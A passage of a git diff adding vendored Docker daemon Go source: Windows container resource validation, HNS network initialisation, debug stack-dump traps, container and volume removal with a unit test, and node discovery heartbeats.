CPU percent discarded") + resources.CPUPercent = 0 + } + } else if resources.CPUShares > 0 { + if resources.CPUPercent > 0 { + warnings = append(warnings, "Conflicting options: CPU shares takes priority over CPU percent on Windows Server Containers. CPU percent discarded") + logrus.Warn("Conflicting options: CPU shares takes priority over CPU percent on Windows Server Containers. CPU percent discarded") + resources.CPUPercent = 0 + } + } + } + + if resources.CPUShares < 0 || resources.CPUShares > windowsMaxCPUShares { + return warnings, fmt.Errorf("range of CPUShares is from %d to %d", windowsMinCPUShares, windowsMaxCPUShares) + } + if resources.CPUPercent < 0 || resources.CPUPercent > windowsMaxCPUPercent { + return warnings, fmt.Errorf("range of CPUPercent is from %d to %d", windowsMinCPUPercent, windowsMaxCPUPercent) + } + if resources.CPUCount < 0 { + return warnings, fmt.Errorf("invalid CPUCount: CPUCount cannot be negative") + } + + if resources.NanoCPUs > 0 && resources.CPUPercent > 0 { + return warnings, fmt.Errorf("conflicting options: Nano CPUs and CPU Percent cannot both be set") + } + if resources.NanoCPUs > 0 && resources.CPUShares > 0 { + return warnings, fmt.Errorf("conflicting options: Nano CPUs and CPU Shares cannot both be set") + } + // The precision we could get is 0.01, because on Windows we have to convert to CPUPercent. + // We don't set the lower limit here and it is up to the underlying platform (e.g., Windows) to return an error. 
+ if resources.NanoCPUs < 0 || resources.NanoCPUs > int64(sysinfo.NumCPU())*1e9 { + return warnings, fmt.Errorf("range of CPUs is from 0.01 to %d.00, as there are only %d CPUs available", sysinfo.NumCPU(), sysinfo.NumCPU()) + } + + if len(resources.BlkioDeviceReadBps) > 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support BlkioDeviceReadBps") + } + if len(resources.BlkioDeviceReadIOps) > 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support BlkioDeviceReadIOps") + } + if len(resources.BlkioDeviceWriteBps) > 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support BlkioDeviceWriteBps") + } + if len(resources.BlkioDeviceWriteIOps) > 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support BlkioDeviceWriteIOps") + } + if resources.BlkioWeight > 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support BlkioWeight") + } + if len(resources.BlkioWeightDevice) > 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support BlkioWeightDevice") + } + if resources.CgroupParent != "" { + return warnings, fmt.Errorf("invalid option: Windows does not support CgroupParent") + } + if resources.CPUPeriod != 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support CPUPeriod") + } + if resources.CpusetCpus != "" { + return warnings, fmt.Errorf("invalid option: Windows does not support CpusetCpus") + } + if resources.CpusetMems != "" { + return warnings, fmt.Errorf("invalid option: Windows does not support CpusetMems") + } + if resources.KernelMemory != 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support KernelMemory") + } + if resources.MemoryReservation != 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support MemoryReservation") + } + if resources.MemorySwap != 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support MemorySwap") + } + if resources.MemorySwappiness != nil && 
*resources.MemorySwappiness != -1 { + return warnings, fmt.Errorf("invalid option: Windows does not support MemorySwappiness") + } + if resources.OomKillDisable != nil && *resources.OomKillDisable { + return warnings, fmt.Errorf("invalid option: Windows does not support OomKillDisable") + } + if resources.PidsLimit != 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support PidsLimit") + } + if len(resources.Ulimits) != 0 { + return warnings, fmt.Errorf("invalid option: Windows does not support Ulimits") + } + return warnings, nil +} + +// verifyPlatformContainerSettings performs platform-specific validation of the +// hostconfig and config structures. +func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) { + warnings := []string{} + + hyperv := daemon.runAsHyperVContainer(hostConfig) + if !hyperv && system.IsWindowsClient() { + // @engine maintainers. This block should not be removed. It partially enforces licensing + // restrictions on Windows. Ping @jhowardmsft if there are concerns or PRs to change this. + return warnings, fmt.Errorf("Windows client operating systems only support Hyper-V containers") + } + + w, err := verifyContainerResources(&hostConfig.Resources, hyperv) + warnings = append(warnings, w...) + if err != nil { + return warnings, err + } + return warnings, nil +} + +// platformReload update configuration with platform specific options +func (daemon *Daemon) platformReload(config *Config) map[string]string { + return map[string]string{} +} + +// verifyDaemonSettings performs validation of daemon config struct +func verifyDaemonSettings(config *Config) error { + return nil +} + +// checkSystem validates platform-specific requirements +func checkSystem() error { + // Validate the OS version. Note that docker.exe must be manifested for this + // call to return the correct version. 
+ osv := system.GetOSVersion() + if osv.MajorVersion < 10 { + return fmt.Errorf("This version of Windows does not support the docker daemon") + } + if osv.Build < 14393 { + return fmt.Errorf("The docker daemon requires build 14393 or later of Windows Server 2016 or Windows 10") + } + + vmcompute := windows.NewLazySystemDLL("vmcompute.dll") + if vmcompute.Load() != nil { + return fmt.Errorf("Failed to load vmcompute.dll. Ensure that the Containers role is installed.") + } + return nil +} + +// configureKernelSecuritySupport configures and validate security support for the kernel +func configureKernelSecuritySupport(config *Config, driverName string) error { + return nil +} + +// configureMaxThreads sets the Go runtime max threads threshold +func configureMaxThreads(config *Config) error { + return nil +} + +func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) { + netOptions, err := daemon.networkOptions(config, nil, nil) + if err != nil { + return nil, err + } + controller, err := libnetwork.New(netOptions...) 
+ if err != nil { + return nil, fmt.Errorf("error obtaining controller instance: %v", err) + } + + hnsresponse, err := hcsshim.HNSListNetworkRequest("GET", "", "") + if err != nil { + return nil, err + } + + // Remove networks not present in HNS + for _, v := range controller.Networks() { + options := v.Info().DriverOptions() + hnsid := options[winlibnetwork.HNSID] + found := false + + for _, v := range hnsresponse { + if v.Id == hnsid { + found = true + break + } + } + + if !found { + // global networks should not be deleted by local HNS + if v.Info().Scope() != datastore.GlobalScope { + err = v.Delete() + if err != nil { + logrus.Errorf("Error occurred when removing network %v", err) + } + } + } + } + + _, err = controller.NewNetwork("null", "none", "", libnetwork.NetworkOptionPersist(false)) + if err != nil { + return nil, err + } + + defaultNetworkExists := false + + if network, err := controller.NetworkByName(runconfig.DefaultDaemonNetworkMode().NetworkName()); err == nil { + options := network.Info().DriverOptions() + for _, v := range hnsresponse { + if options[winlibnetwork.HNSID] == v.Id { + defaultNetworkExists = true + break + } + } + } + + // discover and add HNS networks to windows + // network that exist are removed and added again + for _, v := range hnsresponse { + var n libnetwork.Network + s := func(current libnetwork.Network) bool { + options := current.Info().DriverOptions() + if options[winlibnetwork.HNSID] == v.Id { + n = current + return true + } + return false + } + + controller.WalkNetworks(s) + if n != nil { + // global networks should not be deleted by local HNS + if n.Info().Scope() == datastore.GlobalScope { + continue + } + v.Name = n.Name() + // This will not cause network delete from HNS as the network + // is not yet populated in the libnetwork windows driver + n.Delete() + } + + netOption := map[string]string{ + winlibnetwork.NetworkName: v.Name, + winlibnetwork.HNSID: v.Id, + } + + v4Conf := []*libnetwork.IpamConf{} + for _, 
subnet := range v.Subnets { + ipamV4Conf := libnetwork.IpamConf{} + ipamV4Conf.PreferredPool = subnet.AddressPrefix + ipamV4Conf.Gateway = subnet.GatewayAddress + v4Conf = append(v4Conf, &ipamV4Conf) + } + + name := v.Name + + // If there is no nat network create one from the first NAT network + // encountered + if !defaultNetworkExists && runconfig.DefaultDaemonNetworkMode() == containertypes.NetworkMode(strings.ToLower(v.Type)) { + name = runconfig.DefaultDaemonNetworkMode().NetworkName() + defaultNetworkExists = true + } + + v6Conf := []*libnetwork.IpamConf{} + _, err := controller.NewNetwork(strings.ToLower(v.Type), name, "", + libnetwork.NetworkOptionGeneric(options.Generic{ + netlabel.GenericData: netOption, + }), + libnetwork.NetworkOptionIpam("default", "", v4Conf, v6Conf, nil), + ) + + if err != nil { + logrus.Errorf("Error occurred when creating network %v", err) + } + } + + if !config.DisableBridge { + // Initialize default driver "bridge" + if err := initBridgeDriver(controller, config); err != nil { + return nil, err + } + } + + return controller, nil +} + +func initBridgeDriver(controller libnetwork.NetworkController, config *Config) error { + if _, err := controller.NetworkByName(runconfig.DefaultDaemonNetworkMode().NetworkName()); err == nil { + return nil + } + + netOption := map[string]string{ + winlibnetwork.NetworkName: runconfig.DefaultDaemonNetworkMode().NetworkName(), + } + + var ipamOption libnetwork.NetworkOption + var subnetPrefix string + + if config.bridgeConfig.FixedCIDR != "" { + subnetPrefix = config.bridgeConfig.FixedCIDR + } else { + // TP5 doesn't support properly detecting subnet + osv := system.GetOSVersion() + if osv.Build < 14360 { + subnetPrefix = defaultNetworkSpace + } + } + + if subnetPrefix != "" { + ipamV4Conf := libnetwork.IpamConf{} + ipamV4Conf.PreferredPool = subnetPrefix + v4Conf := []*libnetwork.IpamConf{&ipamV4Conf} + v6Conf := []*libnetwork.IpamConf{} + ipamOption = libnetwork.NetworkOptionIpam("default", "", 
v4Conf, v6Conf, nil) + } + + _, err := controller.NewNetwork(string(runconfig.DefaultDaemonNetworkMode()), runconfig.DefaultDaemonNetworkMode().NetworkName(), "", + libnetwork.NetworkOptionGeneric(options.Generic{ + netlabel.GenericData: netOption, + }), + ipamOption, + ) + + if err != nil { + return fmt.Errorf("Error creating default network: %v", err) + } + + return nil +} + +// registerLinks sets up links between containers and writes the +// configuration out for persistence. As of Windows TP4, links are not supported. +func (daemon *Daemon) registerLinks(container *container.Container, hostConfig *containertypes.HostConfig) error { + return nil +} + +func (daemon *Daemon) cleanupMountsByID(in string) error { + return nil +} + +func (daemon *Daemon) cleanupMounts() error { + return nil +} + +func setupRemappedRoot(config *Config) ([]idtools.IDMap, []idtools.IDMap, error) { + return nil, nil, nil +} + +func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error { + config.Root = rootDir + // Create the root directory if it doesn't exists + if err := system.MkdirAllWithACL(config.Root, 0); err != nil && !os.IsExist(err) { + return err + } + return nil +} + +// runasHyperVContainer returns true if we are going to run as a Hyper-V container +func (daemon *Daemon) runAsHyperVContainer(hostConfig *containertypes.HostConfig) bool { + if hostConfig.Isolation.IsDefault() { + // Container is set to use the default, so take the default from the daemon configuration + return daemon.defaultIsolation.IsHyperV() + } + + // Container is requesting an isolation mode. Honour it. + return hostConfig.Isolation.IsHyperV() + +} + +// conditionalMountOnStart is a platform specific helper function during the +// container start to call mount. 
+func (daemon *Daemon) conditionalMountOnStart(container *container.Container) error { + // We do not mount if a Hyper-V container + if !daemon.runAsHyperVContainer(container.HostConfig) { + return daemon.Mount(container) + } + return nil +} + +// conditionalUnmountOnCleanup is a platform specific helper function called +// during the cleanup of a container to unmount. +func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container) error { + // We do not unmount if a Hyper-V container + if !daemon.runAsHyperVContainer(container.HostConfig) { + return daemon.Unmount(container) + } + return nil +} + +func driverOptions(config *Config) []nwconfig.Option { + return []nwconfig.Option{} +} + +func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) { + if !c.IsRunning() { + return nil, errNotRunning{c.ID} + } + + // Obtain the stats from HCS via libcontainerd + stats, err := daemon.containerd.Stats(c.ID) + if err != nil { + return nil, err + } + + // Start with an empty structure + s := &types.StatsJSON{} + + // Populate the CPU/processor statistics + s.CPUStats = types.CPUStats{ + CPUUsage: types.CPUUsage{ + TotalUsage: stats.Processor.TotalRuntime100ns, + UsageInKernelmode: stats.Processor.RuntimeKernel100ns, + UsageInUsermode: stats.Processor.RuntimeKernel100ns, + }, + } + + // Populate the memory statistics + s.MemoryStats = types.MemoryStats{ + Commit: stats.Memory.UsageCommitBytes, + CommitPeak: stats.Memory.UsageCommitPeakBytes, + PrivateWorkingSet: stats.Memory.UsagePrivateWorkingSetBytes, + } + + // Populate the storage statistics + s.StorageStats = types.StorageStats{ + ReadCountNormalized: stats.Storage.ReadCountNormalized, + ReadSizeBytes: stats.Storage.ReadSizeBytes, + WriteCountNormalized: stats.Storage.WriteCountNormalized, + WriteSizeBytes: stats.Storage.WriteSizeBytes, + } + + // Populate the network statistics + s.Networks = make(map[string]types.NetworkStats) + + for _, nstats := range stats.Network { + 
s.Networks[nstats.EndpointId] = types.NetworkStats{ + RxBytes: nstats.BytesReceived, + RxPackets: nstats.PacketsReceived, + RxDropped: nstats.DroppedPacketsIncoming, + TxBytes: nstats.BytesSent, + TxPackets: nstats.PacketsSent, + TxDropped: nstats.DroppedPacketsOutgoing, + } + } + + // Set the timestamp + s.Stats.Read = stats.Timestamp + s.Stats.NumProcs = platform.NumProcs() + + return s, nil +} + +// setDefaultIsolation determine the default isolation mode for the +// daemon to run in. This is only applicable on Windows +func (daemon *Daemon) setDefaultIsolation() error { + daemon.defaultIsolation = containertypes.Isolation("process") + // On client SKUs, default to Hyper-V + if system.IsWindowsClient() { + daemon.defaultIsolation = containertypes.Isolation("hyperv") + } + for _, option := range daemon.configStore.ExecOptions { + key, val, err := parsers.ParseKeyValueOpt(option) + if err != nil { + return err + } + key = strings.ToLower(key) + switch key { + + case "isolation": + if !containertypes.Isolation(val).IsValid() { + return fmt.Errorf("Invalid exec-opt value for 'isolation':'%s'", val) + } + if containertypes.Isolation(val).IsHyperV() { + daemon.defaultIsolation = containertypes.Isolation("hyperv") + } + if containertypes.Isolation(val).IsProcess() { + if system.IsWindowsClient() { + // @engine maintainers. This block should not be removed. It partially enforces licensing + // restrictions on Windows. Ping @jhowardmsft if there are concerns or PRs to change this. 
+ return fmt.Errorf("Windows client operating systems only support Hyper-V containers") + } + daemon.defaultIsolation = containertypes.Isolation("process") + } + default: + return fmt.Errorf("Unrecognised exec-opt '%s'\n", key) + } + } + + logrus.Infof("Windows default isolation mode: %s", daemon.defaultIsolation) + return nil +} + +func rootFSToAPIType(rootfs *image.RootFS) types.RootFS { + var layers []string + for _, l := range rootfs.DiffIDs { + layers = append(layers, l.String()) + } + return types.RootFS{ + Type: rootfs.Type, + Layers: layers, + } +} + +func setupDaemonProcess(config *Config) error { + return nil +} + +// verifyVolumesInfo is a no-op on windows. +// This is called during daemon initialization to migrate volumes from pre-1.7. +// volumes were not supported on windows pre-1.7 +func (daemon *Daemon) verifyVolumesInfo(container *container.Container) error { + return nil +} + +func (daemon *Daemon) setupSeccompProfile() error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/debugtrap.go b/vendor/github.com/docker/docker/daemon/debugtrap.go new file mode 100644 index 0000000000..209048b589 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/debugtrap.go @@ -0,0 +1,62 @@ +package daemon + +import ( + "fmt" + "os" + "path/filepath" + "strings" + "time" + + "github.com/davecgh/go-spew/spew" + "github.com/pkg/errors" +) + +const dataStructuresLogNameTemplate = "daemon-data-%s.log" + +// dumpDaemon appends the daemon datastructures into file in dir and returns full path +// to that file. 
+func (d *Daemon) dumpDaemon(dir string) (string, error) { + // Ensure we recover from a panic as we are doing this without any locking + defer func() { + recover() + }() + + path := filepath.Join(dir, fmt.Sprintf(dataStructuresLogNameTemplate, strings.Replace(time.Now().Format(time.RFC3339), ":", "", -1))) + f, err := os.OpenFile(path, os.O_CREATE|os.O_WRONLY, 0666) + if err != nil { + return "", errors.Wrap(err, "failed to open file to write the daemon datastructure dump") + } + defer f.Close() + + dump := struct { + containers interface{} + names interface{} + links interface{} + execs interface{} + volumes interface{} + images interface{} + layers interface{} + imageReferences interface{} + downloads interface{} + uploads interface{} + registry interface{} + plugins interface{} + }{ + containers: d.containers, + execs: d.execCommands, + volumes: d.volumes, + images: d.imageStore, + layers: d.layerStore, + imageReferences: d.referenceStore, + downloads: d.downloadManager, + uploads: d.uploadManager, + registry: d.RegistryService, + plugins: d.PluginStore, + names: d.nameIndex, + links: d.linkIndex, + } + + spew.Fdump(f, dump) // Does not return an error + f.Sync() + return path, nil +} diff --git a/vendor/github.com/docker/docker/daemon/debugtrap_unix.go b/vendor/github.com/docker/docker/daemon/debugtrap_unix.go new file mode 100644 index 0000000000..d650eb7f8c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/debugtrap_unix.go @@ -0,0 +1,33 @@ +// +build !windows + +package daemon + +import ( + "os" + "os/signal" + "syscall" + + "github.com/Sirupsen/logrus" + stackdump "github.com/docker/docker/pkg/signal" +) + +func (d *Daemon) setupDumpStackTrap(root string) { + c := make(chan os.Signal, 1) + signal.Notify(c, syscall.SIGUSR1) + go func() { + for range c { + path, err := stackdump.DumpStacks(root) + if err != nil { + logrus.WithError(err).Error("failed to write goroutines dump") + } else { + logrus.Infof("goroutine stacks written to %s", path) + } + 
path, err = d.dumpDaemon(root) + if err != nil { + logrus.WithError(err).Error("failed to write daemon datastructure dump") + } else { + logrus.Infof("daemon datastructure dump written to %s", path) + } + } + }() +} diff --git a/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go b/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go new file mode 100644 index 0000000000..f5b9170907 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go @@ -0,0 +1,7 @@ +// +build !linux,!darwin,!freebsd,!windows,!solaris + +package daemon + +func (d *Daemon) setupDumpStackTrap(_ string) { + return +} diff --git a/vendor/github.com/docker/docker/daemon/debugtrap_windows.go b/vendor/github.com/docker/docker/daemon/debugtrap_windows.go new file mode 100644 index 0000000000..fb20c9d2c5 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/debugtrap_windows.go @@ -0,0 +1,52 @@ +package daemon + +import ( + "fmt" + "os" + "syscall" + "unsafe" + + winio "github.com/Microsoft/go-winio" + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/signal" + "github.com/docker/docker/pkg/system" +) + +func (d *Daemon) setupDumpStackTrap(root string) { + // Windows does not support signals like *nix systems. So instead of + // trapping on SIGUSR1 to dump stacks, we wait on a Win32 event to be + // signaled. 
ACL'd to builtin administrators and local system + ev := "Global\\docker-daemon-" + fmt.Sprint(os.Getpid()) + sd, err := winio.SddlToSecurityDescriptor("D:P(A;;GA;;;BA)(A;;GA;;;SY)") + if err != nil { + logrus.Errorf("failed to get security descriptor for debug stackdump event %s: %s", ev, err.Error()) + return + } + var sa syscall.SecurityAttributes + sa.Length = uint32(unsafe.Sizeof(sa)) + sa.InheritHandle = 1 + sa.SecurityDescriptor = uintptr(unsafe.Pointer(&sd[0])) + h, err := system.CreateEvent(&sa, false, false, ev) + if h == 0 || err != nil { + logrus.Errorf("failed to create debug stackdump event %s: %s", ev, err.Error()) + return + } + go func() { + logrus.Debugf("Stackdump - waiting signal at %s", ev) + for { + syscall.WaitForSingleObject(h, syscall.INFINITE) + path, err := signal.DumpStacks(root) + if err != nil { + logrus.WithError(err).Error("failed to write goroutines dump") + } else { + logrus.Infof("goroutine stacks written to %s", path) + } + path, err = d.dumpDaemon(root) + if err != nil { + logrus.WithError(err).Error("failed to write daemon datastructure dump") + } else { + logrus.Infof("daemon datastructure dump written to %s", path) + } + } + }() +} diff --git a/vendor/github.com/docker/docker/daemon/delete.go b/vendor/github.com/docker/docker/daemon/delete.go new file mode 100644 index 0000000000..6b622bde37 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/delete.go @@ -0,0 +1,168 @@ +package daemon + +import ( + "fmt" + "os" + "path" + "strings" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/types" + "github.com/docker/docker/container" + "github.com/docker/docker/layer" + volumestore "github.com/docker/docker/volume/store" +) + +// ContainerRm removes the container id from the filesystem. An error +// is returned if the container is not found, or if the remove +// fails. If the remove succeeds, the container name is released, and +// network links are removed. 
+func (daemon *Daemon) ContainerRm(name string, config *types.ContainerRmConfig) error { + start := time.Now() + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + // Container state RemovalInProgress should be used to avoid races. + if inProgress := container.SetRemovalInProgress(); inProgress { + err := fmt.Errorf("removal of container %s is already in progress", name) + return errors.NewBadRequestError(err) + } + defer container.ResetRemovalInProgress() + + // check if container wasn't deregistered by previous rm since Get + if c := daemon.containers.Get(container.ID); c == nil { + return nil + } + + if config.RemoveLink { + return daemon.rmLink(container, name) + } + + err = daemon.cleanupContainer(container, config.ForceRemove, config.RemoveVolume) + containerActions.WithValues("delete").UpdateSince(start) + + return err +} + +func (daemon *Daemon) rmLink(container *container.Container, name string) error { + if name[0] != '/' { + name = "/" + name + } + parent, n := path.Split(name) + if parent == "/" { + return fmt.Errorf("Conflict, cannot remove the default name of the container") + } + + parent = strings.TrimSuffix(parent, "/") + pe, err := daemon.nameIndex.Get(parent) + if err != nil { + return fmt.Errorf("Cannot get parent %s for name %s", parent, name) + } + + daemon.releaseName(name) + parentContainer, _ := daemon.GetContainer(pe) + if parentContainer != nil { + daemon.linkIndex.unlink(name, container, parentContainer) + if err := daemon.updateNetwork(parentContainer); err != nil { + logrus.Debugf("Could not update network to remove link %s: %v", n, err) + } + } + return nil +} + +// cleanupContainer unregisters a container from the daemon, stops stats +// collection and cleanly removes contents and metadata from the filesystem. 
+func (daemon *Daemon) cleanupContainer(container *container.Container, forceRemove, removeVolume bool) (err error) { + if container.IsRunning() { + if !forceRemove { + err := fmt.Errorf("You cannot remove a running container %s. Stop the container before attempting removal or use -f", container.ID) + return errors.NewRequestConflictError(err) + } + if err := daemon.Kill(container); err != nil { + return fmt.Errorf("Could not kill running container %s, cannot remove - %v", container.ID, err) + } + } + + // stop collection of stats for the container regardless + // if stats are currently getting collected. + daemon.statsCollector.stopCollection(container) + + if err = daemon.containerStop(container, 3); err != nil { + return err + } + + // Mark container dead. We don't want anybody to be restarting it. + container.SetDead() + + // Save container state to disk. So that if error happens before + // container meta file got removed from disk, then a restart of + // docker should not make a dead container alive. + if err := container.ToDiskLocking(); err != nil && !os.IsNotExist(err) { + logrus.Errorf("Error saving dying container to disk: %v", err) + } + + // If force removal is required, delete container from various + // indexes even if removal failed. 
+ defer func() { + if err == nil || forceRemove { + daemon.nameIndex.Delete(container.ID) + daemon.linkIndex.delete(container) + selinuxFreeLxcContexts(container.ProcessLabel) + daemon.idIndex.Delete(container.ID) + daemon.containers.Delete(container.ID) + if e := daemon.removeMountPoints(container, removeVolume); e != nil { + logrus.Error(e) + } + daemon.LogContainerEvent(container, "destroy") + } + }() + + if err = os.RemoveAll(container.Root); err != nil { + return fmt.Errorf("Unable to remove filesystem for %v: %v", container.ID, err) + } + + // When container creation fails and `RWLayer` has not been created yet, we + // do not call `ReleaseRWLayer` + if container.RWLayer != nil { + metadata, err := daemon.layerStore.ReleaseRWLayer(container.RWLayer) + layer.LogReleaseMetadata(metadata) + if err != nil && err != layer.ErrMountDoesNotExist { + return fmt.Errorf("Driver %s failed to remove root filesystem %s: %s", daemon.GraphDriverName(), container.ID, err) + } + } + + return nil +} + +// VolumeRm removes the volume with the given name. 
+// If the volume is referenced by a container it is not removed +// This is called directly from the Engine API +func (daemon *Daemon) VolumeRm(name string, force bool) error { + err := daemon.volumeRm(name) + if err == nil || force { + daemon.volumes.Purge(name) + return nil + } + return err +} + +func (daemon *Daemon) volumeRm(name string) error { + v, err := daemon.volumes.Get(name) + if err != nil { + return err + } + + if err := daemon.volumes.Remove(v); err != nil { + if volumestore.IsInUse(err) { + err := fmt.Errorf("Unable to remove volume, volume still in use: %v", err) + return errors.NewRequestConflictError(err) + } + return fmt.Errorf("Error while removing volume %s: %v", name, err) + } + daemon.LogVolumeEvent(v.Name(), "destroy", map[string]string{"driver": v.DriverName()}) + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/delete_test.go b/vendor/github.com/docker/docker/daemon/delete_test.go new file mode 100644 index 0000000000..1fd27e1ffa --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/delete_test.go @@ -0,0 +1,43 @@ +package daemon + +import ( + "fmt" + "io/ioutil" + "os" + "testing" + + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" +) + +func TestContainerDoubleDelete(t *testing.T) { + tmp, err := ioutil.TempDir("", "docker-daemon-unix-test-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + daemon := &Daemon{ + repository: tmp, + root: tmp, + } + daemon.containers = container.NewMemoryStore() + + container := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "test", + State: container.NewState(), + Config: &containertypes.Config{}, + }, + } + daemon.containers.Add(container.ID, container) + + // Mark the container as having a delete in progress + container.SetRemovalInProgress() + + // Try to remove the container when its state is removalInProgress. 
+ // It should return an error indicating it is under removal progress. + if err := daemon.ContainerRm(container.ID, &types.ContainerRmConfig{ForceRemove: true}); err == nil { + t.Fatalf("expected err: %v, got nil", fmt.Sprintf("removal of container %s is already in progress", container.ID)) + } +} diff --git a/vendor/github.com/docker/docker/daemon/discovery.go b/vendor/github.com/docker/docker/daemon/discovery.go new file mode 100644 index 0000000000..ee4ea875b7 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/discovery.go @@ -0,0 +1,215 @@ +package daemon + +import ( + "errors" + "fmt" + "reflect" + "strconv" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/discovery" + + // Register the libkv backends for discovery. + _ "github.com/docker/docker/pkg/discovery/kv" +) + +const ( + // defaultDiscoveryHeartbeat is the default value for discovery heartbeat interval. + defaultDiscoveryHeartbeat = 20 * time.Second + // defaultDiscoveryTTLFactor is the default TTL factor for discovery + defaultDiscoveryTTLFactor = 3 +) + +var errDiscoveryDisabled = errors.New("discovery is disabled") + +type discoveryReloader interface { + discovery.Watcher + Stop() + Reload(backend, address string, clusterOpts map[string]string) error + ReadyCh() <-chan struct{} +} + +type daemonDiscoveryReloader struct { + backend discovery.Backend + ticker *time.Ticker + term chan bool + readyCh chan struct{} +} + +func (d *daemonDiscoveryReloader) Watch(stopCh <-chan struct{}) (<-chan discovery.Entries, <-chan error) { + return d.backend.Watch(stopCh) +} + +func (d *daemonDiscoveryReloader) ReadyCh() <-chan struct{} { + return d.readyCh +} + +func discoveryOpts(clusterOpts map[string]string) (time.Duration, time.Duration, error) { + var ( + heartbeat = defaultDiscoveryHeartbeat + ttl = defaultDiscoveryTTLFactor * defaultDiscoveryHeartbeat + ) + + if hb, ok := clusterOpts["discovery.heartbeat"]; ok { + h, err := strconv.Atoi(hb) + if err != nil { + return 
time.Duration(0), time.Duration(0), err + } + + if h <= 0 { + return time.Duration(0), time.Duration(0), + fmt.Errorf("discovery.heartbeat must be positive") + } + + heartbeat = time.Duration(h) * time.Second + ttl = defaultDiscoveryTTLFactor * heartbeat + } + + if tstr, ok := clusterOpts["discovery.ttl"]; ok { + t, err := strconv.Atoi(tstr) + if err != nil { + return time.Duration(0), time.Duration(0), err + } + + if t <= 0 { + return time.Duration(0), time.Duration(0), + fmt.Errorf("discovery.ttl must be positive") + } + + ttl = time.Duration(t) * time.Second + + if _, ok := clusterOpts["discovery.heartbeat"]; !ok { + h := int(t / defaultDiscoveryTTLFactor) + heartbeat = time.Duration(h) * time.Second + } + + if ttl <= heartbeat { + return time.Duration(0), time.Duration(0), + fmt.Errorf("discovery.ttl timer must be greater than discovery.heartbeat") + } + } + + return heartbeat, ttl, nil +} + +// initDiscovery initializes the nodes discovery subsystem by connecting to the specified backend +// and starts a registration loop to advertise the current node under the specified address. +func initDiscovery(backendAddress, advertiseAddress string, clusterOpts map[string]string) (discoveryReloader, error) { + heartbeat, backend, err := parseDiscoveryOptions(backendAddress, clusterOpts) + if err != nil { + return nil, err + } + + reloader := &daemonDiscoveryReloader{ + backend: backend, + ticker: time.NewTicker(heartbeat), + term: make(chan bool), + readyCh: make(chan struct{}), + } + // We call Register() on the discovery backend in a loop for the whole lifetime of the daemon, + // but we never actually Watch() for nodes appearing and disappearing for the moment. + go reloader.advertiseHeartbeat(advertiseAddress) + return reloader, nil +} + +// advertiseHeartbeat registers the current node against the discovery backend using the specified +// address. The function never returns, as registration against the backend comes with a TTL and +// requires regular heartbeats. 
+func (d *daemonDiscoveryReloader) advertiseHeartbeat(address string) { + var ready bool + if err := d.initHeartbeat(address); err == nil { + ready = true + close(d.readyCh) + } + + for { + select { + case <-d.ticker.C: + if err := d.backend.Register(address); err != nil { + logrus.Warnf("Registering as %q in discovery failed: %v", address, err) + } else { + if !ready { + close(d.readyCh) + ready = true + } + } + case <-d.term: + return + } + } +} + +// initHeartbeat is used to do the first heartbeat. It uses a tight loop until +// either the timeout period is reached or the heartbeat is successful and returns. +func (d *daemonDiscoveryReloader) initHeartbeat(address string) error { + // Setup a short ticker until the first heartbeat has succeeded + t := time.NewTicker(500 * time.Millisecond) + defer t.Stop() + // timeout makes sure that after a period of time we stop being so aggressive trying to reach the discovery service + timeout := time.After(60 * time.Second) + + for { + select { + case <-timeout: + return errors.New("timeout waiting for initial discovery") + case <-d.term: + return errors.New("terminated") + case <-t.C: + if err := d.backend.Register(address); err == nil { + return nil + } + } + } +} + +// Reload makes the watcher to stop advertising and reconfigures it to advertise in a new address. +func (d *daemonDiscoveryReloader) Reload(backendAddress, advertiseAddress string, clusterOpts map[string]string) error { + d.Stop() + + heartbeat, backend, err := parseDiscoveryOptions(backendAddress, clusterOpts) + if err != nil { + return err + } + + d.backend = backend + d.ticker = time.NewTicker(heartbeat) + d.readyCh = make(chan struct{}) + + go d.advertiseHeartbeat(advertiseAddress) + return nil +} + +// Stop terminates the discovery advertising. 
